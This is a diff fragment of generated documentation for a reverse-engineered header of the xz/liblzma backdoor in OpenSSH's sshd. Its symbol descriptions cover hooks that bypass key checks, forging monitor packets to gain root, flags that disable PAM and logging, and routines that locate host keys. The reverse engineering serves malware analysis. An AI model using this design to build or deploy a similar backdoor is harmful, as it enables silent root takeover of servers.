State for the internal SHA-256 implementation.
Definition: xzre.h:267
lzma_sha256_state::size
uint64_t size
Size of the message excluding padding.
Definition: xzre.h:272
-
main_elf
Definition: xzre.h:1532
-
monitor
struct monitor from openssh-portable
Definition: xzre.h:554
-
secret_data_item
Definition: xzre.h:1717
-
sensitive_data
struct sensitive_data from openssh-portable
Definition: xzre.h:566
-
sshd_ctx
Definition: xzre.h:1046
-
sshd_log_ctx
Definition: xzre.h:1109
-
sshd_offsets
Definition: xzre.h:1134
-
sshd_payload_ctx
Definition: xzre.h:1141
-
sshd_proxy_args
Definition: xzre.h:1996
-
sshkey
struct sshkey from openssh-portable
Definition: xzre.h:577
-
string_item
Definition: xzre.h:1556
-
string_item::func_start
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1565
-
string_item::string_id
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1560
-
string_item::xref
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1573
-
string_item::func_end
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1569
-
string_references
Definition: xzre.h:1582
-
secret_data_shift_cursor_t
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1706
-
secret_data_shift_cursor_t::index
u32 index
Definition: xzre.h:1708
-
secret_data_shift_cursor_t::byte_index
u32 byte_index
Definition: xzre.h:1713
-
secret_data_shift_cursor_t::bit_index
u32 bit_index
Definition: xzre.h:1711
-
u_cmd_arguments_t
Definition: xzre.h:1743
+
main_elf
Definition: xzre.h:1538
+
monitor_data
data used within sshd_proxy_elevate
Definition: xzre.h:1879
+
monitor
struct monitor from openssh-portable
Definition: xzre.h:557
+
run_backdoor_commands_data
stack frame layout for run_backdoor_commands
Definition: xzre.h:1912
+
secret_data_item
Definition: xzre.h:1723
+
sensitive_data
struct sensitive_data from openssh-portable
Definition: xzre.h:569
+
sshd_ctx
Definition: xzre.h:1049
+
sshd_log_ctx
Definition: xzre.h:1112
+
sshd_offsets
Definition: xzre.h:1140
+
sshd_payload_ctx
Definition: xzre.h:1147
+
sshkey
struct sshkey from openssh-portable
Definition: xzre.h:580
+
string_item
Definition: xzre.h:1562
+
string_item::func_start
void * func_start
the starting address of the function that referenced the string
Definition: xzre.h:1571
+
string_item::string_id
EncodedStringId string_id
the string that was referenced, in encoded form
Definition: xzre.h:1566
+
string_item::xref
void * xref
location of the instruction that referenced the string
Definition: xzre.h:1579
+
string_item::func_end
void * func_end
the ending address of the function that referenced the string
Definition: xzre.h:1575
+
string_references
Definition: xzre.h:1588
+
payload
payload union within run_backdoor_commands
Definition: xzre.h:1903
+
secret_data_shift_cursor_t
represents a shift register, which will shift a '1' into the secret data array. the low 3 bits repres...
Definition: xzre.h:1712
+
secret_data_shift_cursor_t::index
u32 index
Definition: xzre.h:1714
+
secret_data_shift_cursor_t::byte_index
u32 byte_index
Definition: xzre.h:1719
+
secret_data_shift_cursor_t::bit_index
u32 bit_index
Definition: xzre.h:1717
+
u_cmd_arguments_t
Definition: xzre.h:1749
elf_find_function_pointer
BOOL elf_find_function_pointer(StringXrefId xref_id, void **pOutCodeStart, void **pOutCodeEnd, void **pOutFptrAddr, elf_info_t *elf_info, string_references_t *xrefs, global_context_t *ctx)
this function searches for a function pointer, pointing to a function designated by the given xref_id
get_lzma_allocator_address
fake_lzma_allocator_t * get_lzma_allocator_address(void)
gets the address of the fake LZMA allocator
elf_parse
BOOL elf_parse(Elf64_Ehdr *ehdr, elf_info_t *elf_info)
Parses the given in-memory ELF file into elf_info.
@@ -2196,14 +2251,14 @@
hooks_data_addr
backdoor_hooks_data_t * hooks_data_addr
location of backdoor_hooks_data_t
sha256
BOOL sha256(const void *data, size_t count, u8 *mdBuf, u64 mdBufSize, imported_funcs_t *funcs)
computes the SHA256 hash of the supplied data
find_mov_instruction
BOOL find_mov_instruction(u8 *code_start, u8 *code_end, BOOL is_64bit_operand, BOOL load_flag, dasm_ctx_t *dctx)
finds a MOV instruction.
-
ElfId
ElfId
Definition: xzre.h:371
-
X_ELF_MAIN
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:376
-
CommandFlags2
CommandFlags2
Definition: xzre.h:1797
-
CMDF_CHANGE_MONITOR_REQ
@ CMDF_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1807
-
CMDF_PSELECT
@ CMDF_PSELECT
executes pselect, then exit not compatible with command 2
Definition: xzre.h:1821
-
CMDF_SOCKFD_MASK
@ CMDF_SOCKFD_MASK
(0111_1000 >> 3) & 0xF when CMDF_SOCKET_INDEX is specified
Definition: xzre.h:1828
-
CMDF_IMPERSONATE
@ CMDF_IMPERSONATE
if set, impersonate a user (info from payload) if not set, impersonate root
Definition: xzre.h:1802
-
CMDF_CONTINUATION
@ CMDF_CONTINUATION
more data available in the following packet not compatible with command 3
Definition: xzre.h:1816
+
ElfId
ElfId
Definition: xzre.h:374
+
X_ELF_MAIN
@ X_ELF_MAIN
this is for sshd itself
Definition: xzre.h:379
+
CommandFlags2
CommandFlags2
Definition: xzre.h:1806
+
CMDF_CHANGE_MONITOR_REQ
@ CMDF_CHANGE_MONITOR_REQ
if set, changes the monitor_reqtype field from MONITOR_REQ_AUTHPASSWORD to what's contained in the pa...
Definition: xzre.h:1816
+
CMDF_PSELECT
@ CMDF_PSELECT
executes pselect, then exit not compatible with command 2
Definition: xzre.h:1830
+
CMDF_SOCKFD_MASK
@ CMDF_SOCKFD_MASK
(0111_1000 >> 3) & 0xF when CMDF_SOCKET_INDEX is specified
Definition: xzre.h:1837
+
CMDF_IMPERSONATE
@ CMDF_IMPERSONATE
if set, impersonate a user (info from payload) if not set, impersonate root
Definition: xzre.h:1811
+
CMDF_CONTINUATION
@ CMDF_CONTINUATION
more data available in the following packet not compatible with command 3
Definition: xzre.h:1825
key_payload_hdr_t
struct key_payload_hdr key_payload_hdr_t
the payload header. also used as Chacha IV
find_call_instruction
BOOL find_call_instruction(u8 *code_start, u8 *code_end, u8 *call_target, dasm_ctx_t *dctx)
finds a call instruction
elf_functions
const elf_functions_t elf_functions
special .data.rel.ro section that contains addresses to various functions
@@ -2221,12 +2276,13 @@
is_range_mapped
BOOL is_range_mapped(u8 *addr, u64 length, global_context_t *ctx)
verify if a memory range is mapped
sshd_get_sensitive_data_score_in_do_child
int sshd_get_sensitive_data_score_in_do_child(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if do_child accesses sensitive_data or not
sshd_find_sensitive_data
BOOL sshd_find_sensitive_data(elf_info_t *sshd, elf_info_t *libcrypto, string_references_t *refs, imported_funcs_t *funcs, global_context_t *ctx)
locates sensitive_data within sshd, and resolves some additional libcrypto functions
-
CommandFlags1
CommandFlags1
Definition: xzre.h:1774
-
CMDF_SETLOGMASK
@ CMDF_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1782
-
CMDF_NO_EXTENDED_SIZE
@ CMDF_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1794
-
CMDF_SOCKET_INDEX
@ CMDF_SOCKET_INDEX
custom monitor socket index override
Definition: xzre.h:1786
-
CMDF_DISABLE_PAM
@ CMDF_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1790
-
CMDF_8BYTES
@ CMDF_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1778
+
CommandFlags1
CommandFlags1
Definition: xzre.h:1783
+
CMDF_SETLOGMASK
@ CMDF_SETLOGMASK
disable all logging by setting mask 0x80000000
Definition: xzre.h:1791
+
CMDF_NO_EXTENDED_SIZE
@ CMDF_NO_EXTENDED_SIZE
if set, the union size field must be 0
Definition: xzre.h:1803
+
CMDF_SOCKET_INDEX
@ CMDF_SOCKET_INDEX
custom monitor socket index override
Definition: xzre.h:1795
+
CMDF_DISABLE_PAM
@ CMDF_DISABLE_PAM
if set, disables PAM authentication
Definition: xzre.h:1799
+
CMDF_8BYTES
@ CMDF_8BYTES
the data block contains 8 additional bytes
Definition: xzre.h:1787
+
sshd_proxy_elevate
BOOL sshd_proxy_elevate(monitor_data_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
backdoor_symbind64
uintptr_t backdoor_symbind64(Elf64_Sym *sym, unsigned int ndx, uptr *refcook, uptr *defcook, unsigned int flags, const char *symname)
the backdoored symbind64 installed in GLRO(dl_audit)
find_instruction_with_mem_operand
BOOL find_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA or MOV instruction with an immediate memory operand
get_string_id
EncodedStringId get_string_id(const char *string_begin, const char *string_end)
Get the.
@@ -2236,13 +2292,12 @@
sshd_kex_sshbuf_get
BOOL sshd_kex_sshbuf_get(void *kex, global_context_t *ctx, void **pOutputData, size_t *pOutputSize)
locates an sshbuf within struct kex (FIXME: which?)
elf_handles_t
struct elf_handles elf_handles_t
array of ELF handles
find_add_instruction_with_mem_operand
BOOL find_add_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds an ADD instruction with an immediate memory operand
-
sshd_proxy_elevate
BOOL sshd_proxy_elevate(sshd_proxy_args_t *args, global_context_t *ctx)
forges a new MONITOR_REQ_KEYALLOWED packet, and injects it into the server to gain root privileges th...
elf_find_string_reference
u8 * elf_find_string_reference(elf_info_t *elf_info, EncodedStringId encoded_string_id, u8 *code_start, u8 *code_end)
finds an instruction that references the given string
x86_dasm
BOOL x86_dasm(dasm_ctx_t *ctx, u8 *code_start, u8 *code_end)
disassembles the given x64 code
find_lea_instruction_with_mem_operand
BOOL find_lea_instruction_with_mem_operand(u8 *code_start, u8 *code_end, dasm_ctx_t *dctx, void *mem_address)
finds a LEA instruction with an immediate memory operand
cpuid_reloc_consts
const backdoor_cpuid_reloc_consts_t cpuid_reloc_consts
special .rodata section that contains _cpuid() related GOT offsets
sshd_get_sensitive_data_address_via_krb5ccname
BOOL sshd_get_sensitive_data_address_via_krb5ccname(u8 *data_start, u8 *data_end, u8 *code_start, u8 *code_end, void **sensitive_data_out, elf_info_t *elf)
finds the address of sensitive_data.host_keys in sshd by using getenv( STR_KRB5CCNAME )
-
backdoor_data_t
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1543
+
backdoor_data_t
struct backdoor_data backdoor_data_t
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1549
find_string_reference
u8 * find_string_reference(u8 *code_start, u8 *code_end, const char *str)
finds an instruction that references the given string
sshd_get_sensitive_data_score
int sshd_get_sensitive_data_score(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if accesses sensitive_data or not
secret_data_get_decrypted
BOOL secret_data_get_decrypted(u8 *output, global_context_t *ctx)
obtains a decrypted copy of the secret data
@@ -2267,6 +2322,7 @@
mm_answer_keyverify_hook
int mm_answer_keyverify_hook(struct ssh *ssh, int sock, struct sshbuf *m)
used in conjunction with mm_answer_keyallowed_hook to bypass the key validity check
elf_symbol_get
Elf64_Sym * elf_symbol_get(elf_info_t *elf_info, EncodedStringId encoded_string_id, EncodedStringId sym_version)
Looks up an ELF symbol from a parsed ELF.
count_bits
u32 count_bits(u64 x)
returns the number of 1 bits in x
+
run_backdoor_commands_data_t
struct run_backdoor_commands_data run_backdoor_commands_data_t
stack frame layout for run_backdoor_commands
secret_data_append_from_address
BOOL secret_data_append_from_address(void *addr, secret_data_shift_cursor_t shift_cursor, unsigned shift_count, unsigned operation_index)
calls secret_data_append_singleton with either the given code address or the return address,...
secret_data_append_items
BOOL secret_data_append_items(secret_data_item_t *items, u64 items_count, BOOL(*appender)(secret_data_shift_cursor_t, unsigned, unsigned, int, u8 *))
appends multiple secret data items at once
sshd_get_sensitive_data_score_in_main
int sshd_get_sensitive_data_score_in_main(void *sensitive_data, elf_info_t *elf, string_references_t *refs)
obtains a numeric score which indicates if main accesses sensitive_data or not
@@ -2275,12 +2331,14 @@
key_payload_t
struct key_payload key_payload_t
the contents of the RSA 'n' field
tls_get_addr_reloc_consts
const backdoor_tls_get_addr_reloc_consts_t tls_get_addr_reloc_consts
special .rodata section that contains __tls_get_addr() related GOT offsets
is_gnu_relro
BOOL is_gnu_relro(Elf64_Word p_type, u32 addend)
checks if the provided identifiers represent a PT_GNU_RELRO
+
payload_t
union payload payload_t
payload union within run_backdoor_commands
resolver_call_count
u32 resolver_call_count
counts the number of times the IFUNC resolver is called
init_hook_functions
int init_hook_functions(backdoor_hooks_ctx_t *funcs)
Initializes the structure with hooks-related data.
-
CommandFlags3
CommandFlags3
Definition: xzre.h:1831
-
CMDF_SOCKET_NUM
@ CMDF_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:1835
-
CMDF_MONITOR_REQ_VAL
@ CMDF_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:1839
+
CommandFlags3
CommandFlags3
Definition: xzre.h:1840
+
CMDF_SOCKET_NUM
@ CMDF_SOCKET_NUM
5 bits used to store number of sockets (in cmd3)
Definition: xzre.h:1844
+
CMDF_MONITOR_REQ_VAL
@ CMDF_MONITOR_REQ_VAL
6 bits used to store the monitor req / 2 (might be unused)
Definition: xzre.h:1848
init_elf_entry_ctx
ptrdiff_t init_elf_entry_ctx(elf_entry_ctx_t *ctx)
initialises the elf_entry_ctx_t
+
monitor_data_t
struct monitor_data monitor_data_t
data used within sshd_proxy_elevate
cpuid_random_symbol
const u64 cpuid_random_symbol
a bogus global variable that is used by the backdoor to generate an extra symbol
elf_get_got_symbol
void * elf_get_got_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the GOT symbol with name encoded_string_id from the parsed ELF file.
elf_get_plt_symbol
void * elf_get_plt_symbol(elf_info_t *elf_info, EncodedStringId encoded_string_id)
Gets the PLT symbol with name encoded_string_id from the parsed ELF file.
ssh
(sshd_proxy_args_tmonitor_data_t args,